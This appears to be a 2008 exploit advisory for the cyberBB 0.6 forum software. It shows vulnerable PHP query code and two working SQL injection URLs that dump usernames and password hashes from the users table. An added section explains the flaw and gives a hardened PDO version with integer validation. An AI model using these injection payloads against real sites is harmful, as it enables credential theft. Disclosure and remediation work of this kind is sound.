########################################################################################
#
# Name : cyberBB v. 0.6 Multiple Remote SQL Injection Vulnerabilities
# Author : cOndemned [ Dark-Coders ]
# Greetz : Avantura, str0ke, ZaBeaTy, voo|doo, irk4z, and many, many more...
# Conditions : Magic quotes gpc = On & Off / User must be logged into
#
########################################################################################

source of /show_topic.php :

$id=$_REQUEST['id'];

if(isset($_REQUEST['p'])) $p=$_REQUEST['p']; else $p='';

$db = mysql_connect($mysql_server,$mysql_user,$mysql_pass);

mysql_select_db($mysql_db);

$sql = "SELECT * FROM `topics` WHERE `id` = $id";


proof of concept :

/show_topic.php?id=-1+UNION+SELECT+1,2,3,4,concat(username,0x3a,password),6,7+FROM+users/*


second sql injection (magic quotes gpc must be off):

/profile.php?user='-1+UNION+SELECT+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11+FROM+users/*


just 4 fun

# milw0rm.com [2008-08-18]
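
The first injection works with magic quotes gpc on or off because $id is concatenated into the query in a numeric context, so there is no quote character for magic quotes to escape; the fix is to validate the id as an integer and bind it as a parameter. The block below is an added example, not part of the original advisory or of cyberBB's code. It assumes the PDO MySQL driver and the same $mysql_* config variables as the excerpt; parse_topic_id and fetch_topic are hypothetical helper names.

```php
<?php
// Added example, not cyberBB code: hardened form of the show_topic.php lookup.
// Assumes the PDO MySQL driver and that $mysql_server, $mysql_db, $mysql_user and
// $mysql_pass are already set by the forum's config, as in the original excerpt.

// Hypothetical helper: accept only a positive integer id, else return null.
function parse_topic_id($raw): ?int
{
    if (!is_string($raw)) {
        return null; // missing value or array input such as id[]=1
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Hypothetical helper: look up one topic with the id bound as an integer parameter.
function fetch_topic(PDO $pdo, int $id): ?array
{
    $stmt = $pdo->prepare('SELECT * FROM `topics` WHERE `id` = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Read the id from the query string only, and reject anything non-numeric
// (for example "-1 UNION SELECT ...") before any SQL is built.
$id = parse_topic_id($_GET['id'] ?? null);
if ($id === null) {
    http_response_code(400);
    exit('Invalid topic id');
}

$pdo = new PDO(
    "mysql:host=$mysql_server;dbname=$mysql_db;charset=utf8mb4",
    $mysql_user,
    $mysql_pass,
    [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
    ]
);

$topic = fetch_topic($pdo, $id);
if ($topic === null) {
    http_response_code(404);
    exit('Topic not found');
}
```

The same binding applies to the user parameter in profile.php, using PDO::PARAM_STR, and does not depend on the magic quotes gpc setting.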